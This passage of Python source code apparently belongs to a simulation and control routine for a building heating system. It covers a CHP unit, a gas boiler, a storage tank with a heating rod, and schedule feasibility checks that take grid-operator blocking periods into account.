is_valid = False # more energy should be CONSUMED than the installed power allows
# Sperrzeiten:
# case 1: energy should be produced - is there enough time to produce it when the Sperrzeiten are taken into account?
# can the installed power be used due to the minimal inactivation times
if((q_netto_el_kWh > 0.0) and (not self.chp.get_status()) and (self.chp.get_next_safe_turn_on_time() > actual_time)):
# produce el AND chp is off AND chp cannot be yet turned on
t_left_s = (self.tau_end - self.chp.get_next_safe_turn_on_time()).seconds
# check if there is any time left at all
if(t_left_s < 0):
is_valid = False # there will be NO TIME LEFT to produce the required energy - due to minimal rest time of CHP unit
# check if the time is enough to cover the demand with the installed power of CHP
# expected production from the installed power of CHP:
q_left_kWh = self.chp.get_design_electric_output() * t_left_s / 3600.0 # kWh = kW * s * h/s
if(q_netto_el_kWh > q_left_kWh + prec_kWh):
is_valid = False # there will be NO TIME LEFT to produce the required energy - due to minimal rest time of CHP unit AND due to installed power
# can the installed power be used due to the inactivation times defined by the network operator
(is_relevant, ts, te, delta) = self.time_interval_intersects_sperrzeiten(actual_time, self.tau_end)
q_left_kWh = self.chp.get_design_electric_output() * delta.seconds / 3600.0 # kWh = kW * s * h/s
if ((is_relevant) and (q_netto_el_kWh > q_left_kWh + prec_kWh)): #
print('X : throw exception: the schedule is not feasible due to Sperrzeiten')
is_valid = False
# determine heat produced due to the electricity production/consumption that has to be stored in the storage tank in kWh
if(q_netto_el_kWh > 0.0):
Q_th_kWh = self.chp.get_el_prod_kWh(q_netto_el_kWh) # heat is produced by the CHP unit
elif(q_netto_el_kWh < 0.0):
Q_th_kWh = self.chp.get_design_electric_output() * t_netto_s / 3600.0 # heat is produced by the heating rod placed in the storage tank
# how much heat can be stored in the storage tank?
        last_t_profile = self.storage_tank.output_temperatures() # get the temperature profile in the storage tank
tmax = self.chp.get_max_temp_of_chp() # get maximal temperature that is to be expected from CHP unit
Q_pot_in_kWh = self.thermal_energy_that_can_be_put_in_storage(tmax, last_t_profile) # how much energy can be stored in (put into) storage tank
        # can the heat produced due to electricity production/consumption be accommodated in the storage tank?
if(Q_th_kWh > Q_pot_in_kWh):
is_valid = False # storage tank cannot take up enough heat
return is_valid
# end check_feasibility_of_sched
# ==================================================================
def thermal_energy_that_can_be_put_in_storage(self, tmax, temp_profil):
        # returns thermal energy in kWh that can still be put into the storage tank
# tmax - maximal temperature of the storage tank in °C
# return self.rvk.get_energy_left_to_tmax(tmax)
# copied from storage_tank.calc_energy_left_to_tmax(self, tmax):
# only values below tmax are integrated
p_in_MPa = utils.get_pressure_in_MPa()
calc_option = utils.get_calc_option()
cpmax = utils.cp_fluid_water(tmax, p_in_MPa, calc_option)
wyn = 0.0
# Q in kWh = Dt * cp * V_i * rho_i [ K * J/kg/K * m3 * kg/m3 * h/3600s * 1kW/1000W = kWh]
for tx in temp_profil:
cpx = utils.cp_fluid_water(tx, p_in_MPa, calc_option)
rox = utils.rho_fluid_water(tx, p_in_MPa, calc_option)
if(tmax >= tx):
wyn = wyn + (tmax * cpmax - tx * cpx) * self.slice_volume * rox / (3600.0 * 1000.0)
return wyn
# end thermal_energy_that_can_be_put_in_storage
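    # Worked example for a single slice (assumed values; cp treated as ~4190 J/(kg K)
    # for both temperatures, so tmax*cpmax - tx*cpx ~ (tmax - tx) * cp):
    #   tmax = 80 °C, tx = 60 °C, slice_volume = 0.05 m3, rho ~ 983 kg/m3
    #   -> 20 * 4190 * 0.05 * 983 / (3600 * 1000) ~ 1.14 kWh can still be stored in this slice.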
# ==================================================================
def thermal_energy_that_can_be_got_from_storage(self, tmin, temp_profil):
        # returns thermal energy in kWh that can still be drawn from the storage tank
        # tmin - minimal temperature of the storage tank in °C
# copied from storage_tank.calc_energy_above_tmin
# only values above tmin are integrated
p_in_MPa = utils.get_pressure_in_MPa()
calc_option = utils.get_calc_option()
cpmin = utils.cp_fluid_water(tmin, p_in_MPa, calc_option)
wyn = 0.0
# Q in kWh = Dt * cp * V_i * rho_i [ K * J/kg/K * m3 * kg/m3 * h/3600s * 1kW/1000W = kWh]
for tx in temp_profil:
cpx = utils.cp_fluid_water(tx, p_in_MPa, calc_option)
rox = utils.rho_fluid_water(tx, p_in_MPa, calc_option)
if(tx >= tmin):
wyn = wyn + (tx * cpx - tmin * cpmin) * self.slice_volume * rox / (3600.0 * 1000.0)
return wyn
# end thermal_energy_that_can_be_got_from_storage
# ==================================================================
def time_interval_intersects_sperrzeiten(self, t_start, t_end):
# default results
delta = t_end - t_start
wyn = (False, t_start, t_end, delta)
ts = t_start.time() # ts is t_start in time format
te = t_end.time() # te is t_end in time format
        # check whether the Sperrzeiten (blocking periods) are consistently defined
if(self.sp_active):
if(len(self.sp_start) == len(self.sp_end)):
# check all Sperrzeiten for intersection
                for ii in range(len(self.sp_start)):
tsi = utils.extract_hms_time_from_string(self.sp_start[ii]) # tsi is sp_start in time format
                    tei = utils.extract_hms_time_from_string(self.sp_end[ii]) # tei is sp_end in time format
if(not(((ts < tsi) and (te <= tsi)) or ((ts >= tei) and (te > tei)))): # interval's borders are not outside of the Sperrzeit
if((ts >= tsi) and (ts < tei) and (te > tsi) and (te <= tei)): # both start and end time false ==> within the Sperrzeit
te = ts # no usable time in the interval - times become irrelevant
delta = te - ts
elif((ts >= tsi) and (ts < tei)): # start time false ==> within the Sperrzeit
ts = tei
delta = te - ts
elif((te > tsi) and (te <= tei)): # end time false ==> within the Sperrzeit
te = tsi
delta = te - ts
                        else: # both times correct, Sperrzeit lies within the time interval - choose the first possible interval
#delta = (te - ts) - (tei - tsi)
delta = te - tei + tsi - ts
te = tsi # ts remains unchanged
tswyn = t_start.replace(hour=ts.hour, minute=ts.minute, second = ts.second, microsecond=ts.microsecond)
tewyn = t_end.replace(hour=te.hour, minute=te.minute, second = te.second, microsecond=te.microsecond)
wyn = (True, tswyn, tewyn, delta)
# end if(len(self.sp_start) == len(self.sp_end)):
else:
                print('throw exception - Sperrzeiten (blocking periods) are incorrectly defined')
# end if(len(self.sp_start) == len(self.sp_end)): else:
# end if(self.sp_active):
# returns flag and first possible time interval in datetime format
# end time_interval_intersects_sperrzeiten
return wyn
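    # Illustrative case (assumed times): with a Sperrzeit from 12:00 to 14:00 and a
    # requested interval 13:00 - 15:00, the start lies inside the Sperrzeit, so the
    # usable interval returned is 14:00 - 15:00 and delta equals one hour.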
# ==================================================================
def get_electricity_consumption_of_timestep_kWh(self, time_step_in_s, pred_res_in_s):
# self.electricity_consumption_kWh - predicted electricity consumption within the time slot pred_res_in_s
# time_step_in_s - length of the time step in seconds
# pred_res_in_s - length of the time slot of prediction in seconds
# return electricity consumption within the time step in kWh
        # kWh = kWh * s / s (scaling the slot value down to the time step)
return self.electricity_consumption_kWh * time_step_in_s / pred_res_in_s
# end get_electricity_consumption_of_timestep_kWh
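    # Worked example (assumed values): a predicted consumption of 0.25 kWh for a
    # 900 s prediction slot, scaled to a 60 s time step, gives 0.25 * 60 / 900 ~ 0.017 kWh.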
# ==================================================================
def calc_el_cons_other(self, actual_time, powr_conf):
type_of_prediction = powr_conf['type_of_prediction']
if(type_of_prediction == 'SLP'):
el_data = powr_conf['SLP']
pred_res_in_s = powr_conf['resolution_in_s']
data_set = utils.get_slp_data_set(actual_time, el_data, pred_res_in_s)
# first element of the data_set is relevant for actual_time
# returns value in kWh that represents the whole time slot of length pred_res_in_s
# kWh = kW * s * h/3600s
return data_set[0] * pred_res_in_s / 3600.0
# end calc_el_cons_other
# ==================================================================
def control_execute_schedule(self, actual_time):
# this procedure updates the current schedule when new data is received from the platform
# it also sets the flags for the control mode (self.keep_chp_on and self.keep_chp_off) for an active schedule
# the control algorithm that executes the schedule is to be found in procedure self.control_internal_1
        # This algorithm uses the flags set here to control all appliances
sched = self.current_schedule # get abbreviated name for better readability
# check the change of schedule
if(self.schedule_changed):
Q_old_in_kWh = self.calc_energy_prod_in_old_step(actual_time)
self.free_sched() # reset the schedule's history
self.e_produced_in_kWh = Q_old_in_kWh
self.schedule_changed = False
self.tau_end = self.current_schedule['values'][0]['time_stamp']
if(self.dbg == 2):
print('end_tau = {}'.format(self.tau_end))
# check the validity of the schedule in the given time step == actual_time
(sch_idx, self.tau_end, is_active, value_in_W) = self.check_validity_of_sched(actual_time)
# if schedule is active, set control flags for its execution
if(is_active):
# energy that is to be produced
self.e_to_prod_in_kWh = value_in_W * self.output_resolution_in_s / 3600000.0 # in kWh = W * s * h/3600s * kW/1000W
            # check the feasibility of the schedule - is there enough time left to produce the required energy
is_feasible = self.check_feasibility_of_sched(actual_time)
if(not is_feasible):
# send message to platform, that problems with schedule execution might arise
print('schedule value is infeasible')
# execute the schedule
if((self.e_to_prod_in_kWh<0.0) and(self.e_to_prod_in_kWh<self.e_produced_in_kWh)):
# activate the consumer of electricity
#self.rod_stat = self.storage_tank.get_max_thermal_rod_power() * self.tsm.get_timestep()
                self.chp.turn_off() # turn off the CHP unit if it is on
                self.rod_stat = 1.0 # power usage from 0 to 1; 0 is no power, 1 is full power.
self.keep_chp_on = False
self.keep_chp_off = True
if((self.e_to_prod_in_kWh>0.0) and (self.e_to_prod_in_kWh>self.e_produced_in_kWh)):
self.chp.turn_on() # turn on CHP if it is off
                self.rod_stat = 0.0 # power usage from 0 to 1; 0 is no power, 1 is full power.
self.keep_chp_on = True
self.keep_chp_off = False
else:
self.rod_stat = 0.0
#end control_execute_schedule
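    # Worked example (assumed values): a schedule slot requesting -500 W over a
    # 900 s resolution gives e_to_prod = -500 * 900 / 3600000 = -0.125 kWh; since this
    # is negative and below the energy produced so far, the heating rod is activated
    # and the CHP unit is kept off.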
# ==================================================================
def update_electricity_production_status(self, time_step_in_s, pred_res_in_s):
# update the production
# electricity consumption of the building (= others) in kWh in this time step
Q_cons_el_kWh = self.get_electricity_consumption_of_timestep_kWh(time_step_in_s, pred_res_in_s)
# electricity production by the CHP unit in kWh in this time step
Q_chp_el = self.chp.get_el_prod() * time_step_in_s / 3600.0 # kWh = kW * s * h/3600s
# electricity consumption by the heating rod in the storage tank in kWh in this time step
        Q_rod_el = self.rod_stat * self.storage_tank.get_max_thermal_rod_power() * time_step_in_s / 3600.0 # kWh = kW * s * h/3600s
# balance of the produced and used electrical energy in kWh
delta_q_kWh = Q_chp_el - Q_rod_el - Q_cons_el_kWh
#
self.e_produced_in_kWh = self.e_produced_in_kWh + delta_q_kWh
self.e_to_prod_in_kWh = self.e_to_prod_in_kWh - delta_q_kWh
    # end update_electricity_production_status
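    # Worked example (assumed values): with the CHP producing 5 kW of electricity,
    # the heating rod off and 0.0083 kWh of building consumption in a 60 s step:
    #   delta_q = 5 * 60 / 3600 - 0.0 - 0.0083 ~ 0.075 kWh added to e_produced_in_kWh.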
# ==================================================================
def condition_heating_1(self, t_a, t23, t25):
        # turn on all sources because the storage tank temperature is too low to provide heat
wyn = False
if(t_a <= 15.0): # heating period
if(t23 < t25): # tank water too cold to heat the building
wyn = True
return wyn
# end condition_heating_1
# ==================================================================
def condition_heating_2(self, t2, t3, t21):
        # turn off all sources - because the storage tank is loaded up
wyn = False
        if((t2 > 45.0) or (t3 > 60.0)): # storage tank is filled up with hot water
if(t21 > 45.0): # DHW is warm enough
wyn = True
return wyn
# end condition_heating_2
# ==================================================================
def condition_heating_3(self, t7, t21):
# turn off only the gas boiler because storage tank is partially filled
wyn = False
if(t7 > 45.0): # storage tank is partially filled
if(t21 > 45.0): # DHW is warm enough
wyn = True
return wyn
# end condition_heating_3
# ==================================================================
def ctrl_cond_heating_period(self):
        # the heating period is active when the ambient temperature is at or below 15.0 °C (= self.temp_a_hp)
if(self.t30 <= self.temp_a_hp):
return True
else:
return False
# end ctrl_cond_heating_period
# ==================================================================
def ctrl_cond_dhw_warm_enough(self):
        # domestic hot water is warm enough when it is at least 55.0 degrees Celsius (= self.temp_dhw)
if(self.t21 >= self.temp_dhw):
return True
else:
return False
# end ctrl_cond_dhw_warm_enough
# ==================================================================
def ctrl_cond_storage_empty(self):
        # storage tank is empty
# - if the temperature in its highest point is lower than the temperature required by the heating system
# - if the temperature in its second highest point is lower than the threshold temperature of self.temp_warm
# in the heating period the system has to be able to provide heat for heating system
c1 = (self.t20 < self.t25) and self.ctrl_cond_heating_period()
c2 = (self.t23 < self.t25) and self.ctrl_cond_heating_period()
# at all times the system has to be able to provide hot water for dhw preparation
c3 = (self.t19 < self.temp_warm) or (self.t20 < self.temp_warm)
c4 = (self.t18 < self.temp_dhw) or (self.t19 < self.temp_dhw) or (self.t20 < self.temp_dhw)
if(c1 or c2 or c3 or c4):
return True
else:
return False
# end ctrl_cond_storage_empty
# ==================================================================
def ctrl_cond_storage_full(self):
# storage tank is full
# - when the temperature in its second lowest point is higher than threshold temperature of self.temp_warm
# - when the temperature in its third lowest point is higher than threshold temperature of self.temp_hot
if((self.t2 >= self.temp_warm) or (self.t3 >= self.temp_hot)):
return True
else:
return False
# end ctrl_cond_storage_full
# ==================================================================
def ctrl_cond_storage_almost_empty(self):
# storage tank is almost empty
# - when heating water temperature in its fourth highest point is lower than the temperature required by the heating system
c1 = (self.t17 < self.t25) and self.ctrl_cond_heating_period()
# - when heating water temperature in its fourth highest point is lower than the temperature self.temp_warm
c2 = (self.t17 < self.temp_warm)
# - when heating water temperature in its fourth highest point is lower than the temperature self.temp_dhw
c3 = (self.t17 < self.temp_dhw)
if(c1 or c2 or c3):
return True
else:
return False
# end ctrl_cond_storage_almost_empty
# ==================================================================
def ctrl_cond_storage_almost_full(self):
# storage tank is almost full
# - when heating water temperature in its fourth lowest point is higher than or equal to self.temp_hot
if(self.t4 >= self.temp_hot):
return True
else:
return False
# end ctrl_cond_storage_almost_full
# ==================================================================
def control_internal_1(self, heizkurve, kessel, chp, cvalve, t_a, actual_time, m4, heatc_conf):
# --------------------------------------------------------------
# HEATING PERIOD DETECTION
if(self.ctrl_cond_heating_period()): # heating period
heizkurve.turn_on(t_a)
else:
heizkurve.turn_off()
self.too_cold = 0
self.V_2 = heizkurve.get_volume_flow()
# ..............................................................
# mass flow
m25 = utils.rho_fluid_water(self.t24, self.p_atm, 1) * self.V_2 # mass flow in heating circuit in kg/s
#print('time = {}; type t23 = {}; type t25 = {}'.format(actual_time, type(self.t23), type(self.t25)))
#chp_stat = 0 # status of chp unit
#gb_stat = 0 # status of gas boiler
#hr_stat = 0 # status of electric heating rod in the storage tank
# --------------------------------------------------------------
# consistency check - DO NOT PRODUCE AND CONSUME ELECTRICITY AT THE SAME TIME - NO PRODUCTION FOR OWN USAGE
if(self.keep_chp_off and self.keep_chp_on): # both cannot be true at the same time
self.keep_chp_off = False
self.keep_chp_on = False
# --------------------------------------------------------------
# STATE OF THE STORAGE TANK
# ..............................................................
# state 1 = storage tank is too cold
if(self.ctrl_cond_storage_empty()):
self.tank_state = 1
self.too_cold = 1
# return temperature from the heating system - potentially to be overwritten
self.t24 = self.calc_ret_temp_when_cold(heatc_conf, self.t30, m25, self.t20)
# storage tank is empty, turn all possible heat sources on
#..................................
# TURN ON gas boiler
gb_stat = 1
#..................................
# TURN ON chp unit
chp_stat = 1
if(self.keep_chp_off): # consume electricity
hr_stat = 1
elif(self.keep_chp_on): # produce as much electricity as possible
hr_stat = 0
else:
hr_stat = 0
self.unload = False
# ..............................................................
# state 2 = storage tank is almost empty
elif(self.ctrl_cond_storage_almost_empty()):
self.tank_state = 2
            # turn on an additional heat source if it is not already on
if(self.keep_chp_on): # produce electricity
                # the first two cases concern unloading
if((chp.get_status() == 1) and (kessel.get_status() == 0)):
# CHP unit is already on, only gas heater can be turned on
#..................................
# TURN ON gas boiler
gb_stat = 1
chp_stat = 1
elif((chp.get_status() == 0) and (kessel.get_status() == 1)):
gb_stat = 1
chp_stat = 1
else: # when it's actually loading - leave everything as it is
if(chp.get_status() == 0):
chp_stat = 0
else:
chp_stat = 1
if(kessel.get_status() == 0):
gb_stat = 0
else:
gb_stat = 1
hr_stat = 0
elif(self.keep_chp_off): # consume electricity
                # the first two cases concern unloading
if((chp.get_status() == 1) and (kessel.get_status() == 0)):
gb_stat = 1
chp_stat = 1
elif((chp.get_status() == 0) and (kessel.get_status() == 1)):
gb_stat = 1
if(self.ctrl_option == 1): # 1 - be conservative and do not allow the tank to unload completely ==> no risk of not reaching room temperature
chp_stat = 1
elif(self.ctrl_option == 2): # 2 - allow the storage tank to become fully unloaded ==> risk of not reaching the room temperature
chp_stat = 0
else: # when it's actually loading - leave everything as it is
if(chp.get_status() == 0):
chp_stat = 0
else:
chp_stat = 1
if(kessel.get_status() == 0):
gb_stat = 0
else:
gb_stat = 1
hr_stat = 1
else: # no schedule interference - use only chp unit and gas boiler
                # the first two cases concern unloading
if((chp.get_status() == 1) and (kessel.get_status() == 0)):
gb_stat = 1
chp_stat = 1
elif((chp.get_status() == 0) and (kessel.get_status() == 1)):
chp_stat = 1
gb_stat = 1
else: # when it's actually loading - leave everything as it is
if(chp.get_status() == 0):
chp_stat = 0
else:
chp_stat = 1
if(kessel.get_status() == 0):
gb_stat = 0
else:
gb_stat = 1
hr_stat = 0
self.unload = False
# ..............................................................
# state 3 = storage tank is almost full
elif(self.ctrl_cond_storage_almost_full()):
self.tank_state = 4
# keep only one of the heat sources on depending on their actual status and constraints of the schedule
if(self.unload): # leave everything as it is
if(chp.get_status() == 0):
chp_stat = 0
else:
chp_stat = 1
if(kessel.get_status() == 0):
gb_stat = 0
else:
gb_stat = 1
else:
if(self.keep_chp_on): # produce electricity
chp_stat = 1
gb_stat = 0
hr_stat = 0
elif(self.keep_chp_off): # consume electricity
chp_stat = 0
gb_stat = 0
hr_stat = 1
else: # no schedule interference - use only chp unit and gas boiler
chp_stat = 1
gb_stat = 0
hr_stat = 0
# ..............................................................
# state 4 = storage tank is full
elif(self.ctrl_cond_storage_full()):
self.tank_state = 5
# tank is full, turn off all possible heat sources
chp_stat = 0
gb_stat = 0
hr_stat = 0
self.unload = True
# ..............................................................
# state 5 = storage tank is being loaded/unloaded and the border of high and low temperatures is somewhere in the middle
else:
self.tank_state = 3
if(self.keep_chp_on): # produce electricity
if(chp.get_status() == 0): # turn it on
chp_stat = 1
else:
chp_stat = 1
if(kessel.get_status() == 1): # keep it as it is
gb_stat = 1
else:
gb_stat = 0
if(self.rod_stat > 0.0): # turn it off
hr_stat = 0
else:
hr_stat = 0
elif(self.keep_chp_off): # consume electricity
if(chp.get_status() == 0): # turn it off
chp_stat = 0
else:
chp_stat = 0
if(kessel.get_status() == 1): # keep it as it is
gb_stat = 1
else:
gb_stat = 0
if(self.rod_stat > 0.0): # turn it on
hr_stat = 1
else:
hr_stat = 1
else: # no schedule interference - use only chp unit and gas boiler
if(chp.get_status() == 0): # keep it as it is
chp_stat = 0
else:
chp_stat = 1
if(kessel.get_status() == 1): # keep it as it is
gb_stat = 1
else:
gb_stat = 0
if(self.rod_stat > 0.0): # turn it off
hr_stat = 0
else:
hr_stat = 0
# --------------------------------------------------------------
# DOMESTIC HOT WATER PREPARATION
# domestic hot water priority
if(not self.ctrl_cond_dhw_warm_enough()):
self.dhw_prod = 1
            # the temperature of dhw has to be kept at all times regardless of the state of the storage tank and the occurrence of the heating period
if(self.keep_chp_off): # use up electricity
if((kessel.get_status() == 0) or (gb_stat == 0)):
gb_stat = 1 # turn on gas boiler if it is off
if((self.rod_stat == 0) or (self.rod_stat < 1.0) or (hr_stat == 0) or (hr_stat < 1.0)):
hr_stat = 1 # turn on electric heater if it is off and gas boiler is not enough to heat up the dhw
else:
chp_stat = 1 # turn on chp unit if other measures do not suffice
elif(self.keep_chp_on): # produce electricity
if((chp.get_status() == 0) or (chp_stat == 0)):
chp_stat = 1 # turn on chp unit if it is off
if((kessel.get_status() == 0) or (gb_stat == 0)):
gb_stat = 1 # turn on gas boiler if it is off
else:
hr_stat = 1 # turn on electric heater if it is off and other sources are not up to the task
else: # no schedule interference - use only chp unit and gas boiler
if((chp.get_status() == 0) or (chp_stat == 0)):
chp_stat = 1 # turn on chp unit if it is off
if((kessel.get_status() == 0) or (gb_stat == 0)):
gb_stat = 1 # turn on gas boiler if it is off
else:
self.dhw_prod = 0
#print('chp = {}, bg = {}, hr = {}'.format(chp.get_status(), kessel.get_status(), self.rod_stat))
# --------------------------------------------------------------
# APPLY THE SETTINGS
# chp unit
if(chp_stat == 0):
wyn = chp.turn_off(actual_time)
elif(chp_stat == 1):
if(chp.get_status() == 0):
#..................................
# TURN ON chp unit
wyn = chp.turn_on(actual_time, self.t27) # turn the chp unit on
if (wyn[0] == False):
#H.write('Could not turn CHP unit on at time = {}. Time left to the next turn on = {} s. t23 < t25\n'.format(actual_time,wyn[4].seconds))
if(self.dbg != 3):
print('Could not turn CHP unit on at time = {}. Time left to the next turn on = {} s. t23 < t25'.format(actual_time,wyn[4].seconds))
else:
wyn = chp.get_chp()
#print('TOO COLD, chp is off, t26 = {}; wyn[2] = {}; stat chp = {}; stat boiler = {}'.format(self.t26,wyn[2],chp.get_status(),kessel.get_status()))
#print('chp.get_stat = {}; wyn = {}'.format(chp.get_status(), wyn))
self.t26 = wyn[2]
#self.t27 = wyn[1]
chp.set_inp_temp(self.t27) # temperature incoming from tank to chp
m3 = wyn[3]
self.V_3 = m3 / utils.rho_fluid_water(self.t26, self.p_atm, 1) # in m3/s = kg/s / kg/m3
# gas boiler
if(gb_stat == 0):
wyn = kessel.turn_off(actual_time)
elif(gb_stat == 1):
if(kessel.get_status() == 0):
#..................................
# TURN ON gas boiler
wyn = kessel.turn_on(actual_time) # turn the gas boiler on
if (wyn[0] == False):
#H.write('Could not turn gas boiler on at time = {}. Time left to the next turn on = {} s. t23 < t25\n'.format(actual_time,wyn[4].seconds))
if(self.dbg != 3):
print('Could not turn gas boiler on at time = {}. Time left to the next turn on = {} s. t23 < t25'.format(actual_time,wyn[4].seconds))
else:
wyn = kessel.get_kessel()
#print('t28 = {}; wyn[2] = {}'.format(self.t28,wyn[2]))
self.t28 = wyn[2]
#self.t29 = wyn[1]
kessel.set_inp_temp(self.t29)
m4 = wyn[3]
self.V_4 = m4 / utils.rho_fluid_water(self.t29, self.p_atm, 1) # in m3/s = kg/s / kg/m3
# heating rod in the storage tank
if(hr_stat == 0):
self.rod_stat = 0.0
elif(hr_stat == 1):
self.rod_stat = 1.0
else:
self.rod_stat = hr_stat
# --------------------------------------------------------------
# CALCULATE THE OUTPUTS: return (m23, m25, m4)
cp25 = utils.cp_fluid_water(self.t25, self.p_atm, 1)
cp24 = utils.cp_fluid_water(self.t24, self.p_atm, 1)
cp23 = utils.cp_fluid_water(self.t23, self.p_atm, 1)
if((self.t23 * cp23 - self.t24 * cp24) != 0.0):
# m23 + m_bypass = m25 ==> m_bypass = m25 - m23
# t23 * cp23 * m23 + t24 * cp24 * m_bypass = t25 * cp25 * m25
# t23 * cp23 * m23 + t24 * cp24 * (m25 - m23) = t25 * cp25 * m25
# m23 * (t23 * cp23 - t24 * cp24) = m25 * (t25 * cp25 - t24 * cp24)
m23 = m25 * (self.t25 * cp25 - self.t24 * cp24) / (self.t23 * cp23 - self.t24 * cp24)
else:
m23 = 0.0
if(m25 != 0.0):
cvalve.set_hub(m23 / m25)
                # t25 * cp25 * m25 = t23 * cp23 * m23 + t24 * cp24 * m_bypass
else:
m23 = 0.0
cvalve.set_hub(0.0)
return (m23, m25, m4)
#end control_internal_1
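    # Worked example of the mixing balance above (assumed temperatures, cp treated as
    # constant): with t23 = 70 °C, t24 = 45 °C and t25 = 55 °C,
    #   m23 ~ m25 * (55 - 45) / (70 - 45) = 0.4 * m25,
    # so the control valve hub is set to ~0.4 and the bypass carries the remaining 60 %.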
# ==================================================================
def control_internal_2(self, chp, kessel, actual_time, m4):
# controls - turn all off when the tank is fully loaded
#if(str(type(self.t2))!="<class 'float'>"):
#print('actual_time = {}; t2 = {}; t3 = {}'.format(actual_time, self.t2, self.t3))
#if((self.t2 > 45.0) or (self.t3 > 60.0)):
if(self.condition_heating_2(self.t2, self.t3, self.t21)): # storage tank is loaded up - heat sources can be turned off
if(chp.get_status() == 1): # turn off CHP unit only if it is on in the first place
if((not self.keep_chp_on) or (self.keep_chp_on and kessel.get_status() == 0)): # only when it's ok or the gas boiler is already off
wyn = chp.turn_off(actual_time)
self.t26 = wyn[2]
self.t27 = wyn[1]
m3 = wyn[3]
self.V_3 = m3 / utils.rho_fluid_water(self.t26, self.p_atm, 1) # in m3/s = kg/s / kg/m3
if(kessel.get_status() == 1):
wyn = kessel.turn_off(actual_time)
self.t28 = wyn[2]
self.t29 = wyn[1]
m4 = wyn[3]
self.V_4 = m4 / utils.rho_fluid_water(self.t28, self.p_atm, 1) # in m3/s = kg/s / kg/m3
#print('t2>45||t3>60, turn OFF, chp = {}, kessel = {}'.format(chp.get_status(),kessel.get_status()))
# controls - turn the gas heater off when the tank is more than half loaded
#if(self.t7 > 45.0):
if(self.condition_heating_3(self.t7, self.t21)): # storage tank is partially filled, so that some heat sources can be turned off
if(kessel.get_status() == 1):
wyn = kessel.turn_off(actual_time)
self.t28 = wyn[2]
self.t29 = wyn[1]
m4 = wyn[3]
self.V_4 = m4 / utils.rho_fluid_water(self.t28, self.p_atm, 1) # in m3/s = kg/s / kg/m3
#print('t7>45, turn OFF, chp = {}, kessel = {}'.format(chp.get_status(),kessel.get_status()))
# ..............................................................
#
#
# storage tank
#tank.calc_dhw_heat_exchange(time_step_in_s, t_in_dw , t_out_dw, mstr_dhw)
# controls - turn on the chp unit and heater if the temperature of domestic hot water is too low
if self.t21 < 45.0:
# CHP unit is running already, or it should run as late as possible due to the demands of the schedule
if ((chp.get_status()) or (self.keep_chp_off)):
wyn = kessel.turn_on(actual_time)
if (wyn[0] == False):
#H.write('Could not turn gas boiler on at time = {}. Time left to the next turn on = {} s. t21 < 45\n'.format(actual_time,wyn[4].seconds))
if(self.dbg != 3):
print('Could not turn gas boiler on at time = {}. Time left to the next turn on = {} s. t21 < 45'.format(actual_time,wyn[4].seconds))
self.t28 = wyn[2]
self.t29 = wyn[1]
m4 = wyn[3]
self.V_4 = m4 / utils.rho_fluid_water(self.t29, self.p_atm, 1) # in m3/s = kg/s / kg/m3
#elif((self.keep_chp_off and (kessel.get_status())) or ()): #
else:
wyn = chp.turn_on(actual_time, self.t27)
self.t26 = wyn[2]
self.t27 = wyn[1]
m3 = wyn[3]
if (wyn[0] == False):
#H.write('Could not turn CHP on at time = {}. Time left to the next turn on = {} s. t21 < 45\n'.format(actual_time,wyn[4].seconds))
if(self.dbg != 3):
print('Could not turn CHP on at time = {}. Time left to the next turn on = {} s. t21 < 45'.format(actual_time,wyn[4].seconds))
self.V_3 = m3 / utils.rho_fluid_water(self.t26, self.p_atm, 1) # in m3/s = kg/s / kg/m3
#print('t21<45, turn ON, chp = {}, kessel = {}'.format(chp.get_status(),kessel.get_status()))
elif self.t21 > 85.0:
if(self.dbg != 3):
print('alarm dhw too hot t = {}'.format(self.t21))
#if(self.t21 > 85.0):
#quit()
#print('cond heat on = {}; cond 2 heat on = {}; cond 1 OFF = {}; cond 2 OFF = {}'.format(self.t23 < self.t25, self.t21 < 45.0, ((self.t2 > 45.0) or (self.t3 > 60.0)), self.t7 > 45.0))
# ..............................................................
#end control_internal_2
# ==================================================================
def calc_ret_temp_when_cold(self, heatc_conf, t_a, mstr, t_in):
        # returns the approximated return temperature from the heating system when the input temperature is too low to provide enough energy to cover the heating load
t_in_N = heatc_conf['design_supply_temperature_oC']
t_out_N = heatc_conf['design_return_temperature_oC']
t_i_N = heatc_conf['design_indoor_temperature_oC']
t_a_N = heatc_conf['design_ambient_temperature_oC']
mcp = utils.cp_fluid_water(t_in, utils.get_pressure_in_MPa(), utils.get_calc_option())
Ak = mstr * mcp * (t_in_N - t_out_N) / (0.5 * (t_in_N + t_out_N) - t_i_N)
AWkW = mstr * mcp * (t_in_N - t_out_N) / (t_i_N - t_a_N)
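        # Interpretation (an assumption read from the formula, not stated in the
        # source): Ak acts as the radiator heat transfer coefficient and AWkW as
        # the building heat loss coefficient at design conditions, i.e. the design
        # heat output divided by the corresponding driving temperature difference.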
A1 = Ak / (AWkW + Ak)
A2 = mstr * mcp / Ak
A3 = AWkW / (AWkW + Ak)
B1 = (0.5 * A1 - 0.5 - A2) / (0.5 - 0.5 * A1 - A2)
B2 = A3 / (0.5 - 0.5 * A1 - A2)
return (t_in * B1 + t_a * B2)
# end calc_ret_temp_when_cold
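    # Usage sketch (a minimal illustration; the numeric values below are assumed,
    # only the config keys come from the code above):
    #   heatc_conf = {'design_supply_temperature_oC': 70.0,
    #                 'design_return_temperature_oC': 55.0,
    #                 'design_indoor_temperature_oC': 20.0,
    #                 'design_ambient_temperature_oC': -14.0}
    #   t_ret = self.calc_ret_temp_when_cold(heatc_conf, t_a=-5.0, mstr=0.2, t_in=45.0)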
# ==================================================================
def one_iteration_step(self, tsm, tank, chp, kessel, cvalve, heizkurve, t_a, el_heat_status, actual_time, heatc_conf):
""" one iteration step of the whole RVK system """
#print('\n chp = {}; kessel = {}; t2 = {}; t3 = {}'.format(chp.get_status(), kessel.get_status(), self.t2, self.t3))
# combined heat and power unit - link outputs
wyn = chp.get_chp()
#self.t27 = wyn[1] # tin in °C = self.t1 = wyn[t1]
self.t26 = wyn[2] # tout in °C = chp.get_out_temp = wyn[2]
m3 = wyn[3] # mstr in kg/s
self.V_3 = m3 / utils.rho_fluid_water(self.t26, self.p_atm, 1) # volume flow incoming to chp from tank
        V_chp = chp.get_volume_flow_at_output() # volume flow outgoing from chp into tank
# combined heat and power unit - link inputs
chp.set_inp_temp(self.t27) # temperature incoming from tank to chp
# ..............................................................
# gas boiler - link outputs
wyn = kessel.get_kessel()
#self.t29 = wyn[1] # tin in °C - incoming into gas heater
        self.t28 = wyn[2] # tout in °C - outgoing from gas heater
m4 = wyn[3] # mstr in kg/s - incoming into gas heater
self.V_4 = kessel.get_volume_flow_at_input()
V_kessel = kessel.get_volume_flow_at_output()
# gas boiler - link inputs
